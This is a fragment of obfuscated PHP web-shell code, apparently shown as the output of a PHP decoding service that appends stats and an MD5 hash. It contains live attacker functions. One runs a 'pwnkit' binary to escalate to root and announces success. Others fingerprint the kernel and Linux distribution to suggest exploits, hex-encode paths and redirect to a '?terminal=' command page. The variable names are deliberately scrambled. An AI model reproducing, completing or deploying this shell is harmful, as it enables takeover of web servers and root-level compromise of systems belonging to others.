";echo _mad_cmd("chmod +x mad-pwnkit");if(!_mad_cmd("./pwnkit \"id"")){echo"[!] Cannot running pwnkit";}else{echo"[!] Done Sir. now u can running on root user!";exit;}}function check_function($value){if(_mad_cmd("$value --version")){return"<font color='green'>ON</font>";}else{return"<font color='red'>OFF</font>";}}function kernel_angka(){${"GLOBALS"}["gieflnmwb"]="xplod";$ngmulaqoiiv="xplod";${${"GLOBALS"}["sfzcrf"]}=$GLOBALS["fungsi"][11]();${$ngmulaqoiiv}=explode(" ",${${"GLOBALS"}["sfzcrf"]});${${"GLOBALS"}["jfkjyblycp"]}=explode("-",${${"GLOBALS"}["gieflnmwb"]}[2]);return${${"GLOBALS"}["jfkjyblycp"]}[0];}function hex($n){$uvsuxeyqko="i";$hlnogyjbysux="y";$dbvwxc="n";${$hlnogyjbysux}="";for(${${"GLOBALS"}["fwjnxhukg"]}=0;${${"GLOBALS"}["fwjnxhukg"]}<strlen(${$dbvwxc});${$uvsuxeyqko}++){$iqnjbrrpq="n";$yjzcxqpvd="i";$htseejsobk="y";${$htseejsobk}.=dechex(ord(${$iqnjbrrpq}[${$yjzcxqpvd}]));}return${${"GLOBALS"}["criiwh"]};}function unhex($y){${"GLOBALS"}["tpeewjhjrkd"]="i";${${"GLOBALS"}["wcxklldup"]}="";${"GLOBALS"}["qyvxdlvofhux"]="i";for(${${"GLOBALS"}["qyvxdlvofhux"]}=0;${${"GLOBALS"}["tpeewjhjrkd"]}<strlen(${${"GLOBALS"}["criiwh"]})-1;${${"GLOBALS"}["fwjnxhukg"]}+=2){$gackbqri="y";${"GLOBALS"}["cadsks"]="n";${"GLOBALS"}["yhlmmqbodky"]="y";${${"GLOBALS"}["cadsks"]}.=chr(hexdec(${$gackbqri}[${${"GLOBALS"}["fwjnxhukg"]}].${${"GLOBALS"}["yhlmmqbodky"]}[${${"GLOBALS"}["fwjnxhukg"]}+1]));}return${${"GLOBALS"}["wcxklldup"]};}function suggest_exploit(){$sujzmiispj="xpld";$qpxlofopl="uname";$qzpykjkpfr="xplod";${${"GLOBALS"}["sfzcrf"]}=$GLOBALS["fungsi"][11]();${${"GLOBALS"}["ztiirvwo"]}=explode(" ",${$qpxlofopl});$suoieyewaffg="pl";$hixlvfg="xpld";$ypxqbcucvigz="pl";${$sujzmiispj}=explode("-",${$qzpykjkpfr}[2]);${$ypxqbcucvigz}=explode(".",${$hixlvfg}[0]);return${$suoieyewaffg}[0].".".${${"GLOBALS"}["juhkqgjz"]}[1];}function distro_linux(){${"GLOBALS"}["hynurlhue"]="xplod";${${"GLOBALS"}["sfzcrf"]}=$GLOBALS["fungsi"][11]();$pfwfyyxcpv="uname";${${"GLOBALS"}["hynurlhue"]}=explode(" ",${$pfwfyyxcpv});return${${"GLOBALS"}["ztiirvwo"]}[6];}function redir($url,$value){return"<meta http-equiv="refresh\" content=\"0;url=?terminal=".${${"GLOBALS"}["grbhpgbt"]}."&path=".hex(${${"GLOBALS"}["izrleth"]})."\">";} 
?>

Function Calls

None

Variables

None

Stats

MD5 03b2098ba2eb619f4a1c869d4e239e90
Eval Count 0
Decode Time 49 ms